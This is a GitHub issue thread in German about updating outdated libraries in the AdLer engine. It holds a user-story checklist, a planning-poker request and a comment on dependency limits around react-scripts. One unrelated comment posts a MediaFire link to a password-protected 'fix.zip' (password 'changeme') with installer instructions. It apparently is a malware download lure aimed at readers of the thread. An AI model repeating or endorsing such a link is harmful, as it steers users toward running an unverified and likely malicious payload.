### ISSUE TITLE
[Refactoring] - In der Engine verwendete Libraries aktualisieren

### ISSUE THREAD

**Issue by splican** [ProjektAdLer/2D_3D_AdLer#1055]
**User Story**

Verwendete Libraries sollten aktuell sein.

**Problemstellung**

s.o. & Möglicherweise kommen UI Fehler aus veralteten Libraries

**Akzeptanzkriterien**

- [x] Libraries auf Aktualisierbarkeit überprüft
- [x] Libraries sind aktualisiert

**Definition of Ready**

- [x] User Story ist klein genug für Sprint
- [x] User Story ist für jeden beteiligten Entwickler klar verständlich
- [x] User Story Aufwand ist geschätzt
- [x] User Story hat Akzeptanzkriterien

**Definition of Done**

- [x] Requirements sind erstellt/angepasst und auf Writerside dokumentiert
- [x] Alle Akzeptanzkriterien sind erfüllt
- [x] Die Implementierung ist gepusht
- [x] Eine Code Review wurde durchgeführt (oder in Paired Programming gearbeitet)
- [x] Unittests sind erstellt
- [x] Alle Tests müssen bestanden sein
- [x] Benutzerdokumentation wurde angelegt oder angepasst (Writerside)
- [x] Changelog des jeweiligen Release wurde aktualisiert
- [x] Es gibt keine bekannten Bugs oder für Bug wurde Issue erstellt
- [x] Die Realisierung der User Story wurde erfolgreich durch den Product Owner abgenommen
- [x] [Optional] Dokumentation des Vorgehens oder externer Quellen wurde angelegt (Zenhub Kommentar)
- [x] [Optional] UML Aktivitätsdiagramm wurde erstellt bzw. aktualisiert

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by splican** [comment]
Hey team! Please [add your planning poker estimate](https://app.zenhub.com/workspaces/2D3DAdLerWorkspace-61b878c8596aef0010898ddd/issues/ProjektAdLer/2D_3D_AdLer/1055?planning-poker) with Zenhub @AdLer-Lukas @DerKatsche @Grunick @Lizardguard @mountler

**Comment by mountler** [comment]
Die Bibliotheken typescript, i18next, react-18next können nicht auf höhere major-verison geupgraded werden, da sie eine Abhängigkeit haben zu den Bibliotheken react-app-rewirded und react-scripts, die seit 2 Jahren kein update mehr bekommen haben.
